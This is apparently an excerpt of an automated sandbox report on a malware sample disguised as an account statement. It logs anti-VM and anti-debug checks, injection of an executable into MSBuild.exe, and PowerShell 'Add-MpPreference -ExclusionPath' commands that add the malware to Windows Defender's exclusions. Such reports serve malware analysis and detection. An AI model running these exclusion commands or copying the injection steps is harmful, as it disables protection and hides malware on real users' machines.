                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory allocated: 8DD0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory allocated: 9DD0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory allocated: ADD0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Memory allocated: C90000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Memory allocated: 2A40000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Memory allocated: EE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 identical entries)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3944
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: threadDelayed 1133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: threadDelayed 2252
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: threadDelayed 1671
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: threadDelayed 8186
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe TID: 936 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688 | Thread sleep count: 3944 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4892 | Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 572 | Thread sleep count: 235 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4988 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3088 | Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6920 | Thread sleep count: 1133 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -99875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -99765s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -99656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -99547s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -99437s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6920 | Thread sleep count: 2252 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -99328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -99219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -99109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -99000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -98891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -98781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -98672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -98563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -98438s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -98313s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -98188s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676 | Thread sleep time: -98078s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe TID: 5804 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -23980767295822402s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -99875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1656 | Thread sleep count: 1671 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1656 | Thread sleep count: 8186 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -99766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -99656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -99547s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -99438s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -99328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -99219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -99094s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -98968s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -98859s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -98750s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -98641s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -98516s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -98384s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -98281s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -98172s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -98063s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -97938s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -97813s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -97703s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -97594s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -97469s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -97359s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -97250s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -97141s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -97029s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -96918s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -96812s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -96703s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -96594s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -96469s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -96359s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -96250s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -96141s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -96031s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -95922s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -95813s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -95688s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -95563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -95453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -95344s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -95219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -95109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -95000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -94888s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -94781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -94672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -94563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668 | Thread sleep time: -94438s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard (2 identical entries)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 identical entries)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98078
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 99094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98384
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 98063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 97938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 97813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 97703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 97594
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 97469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 97359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 97250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 97141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 97029
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 96918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 96812
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 96703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 96594
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 96469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 96359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 96250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 96141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 96031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 95922
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 95813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 95688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 95563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 95453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 95344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 95219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 95109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 95000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 94888
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 94781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 94672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 94563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 94438
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\NULLJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                    Source: TgfQNrhQjjseHY.exe, 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: TgfQNrhQjjseHY.exe, 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: MSBuild.exe, 00000008.00000002.2165476952.0000000006287000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3358366394.0000000005C82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_012670B0 CheckRemoteDebuggerPresent, 8_2_012670B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe"
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe"
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F7F008
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 697008
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"
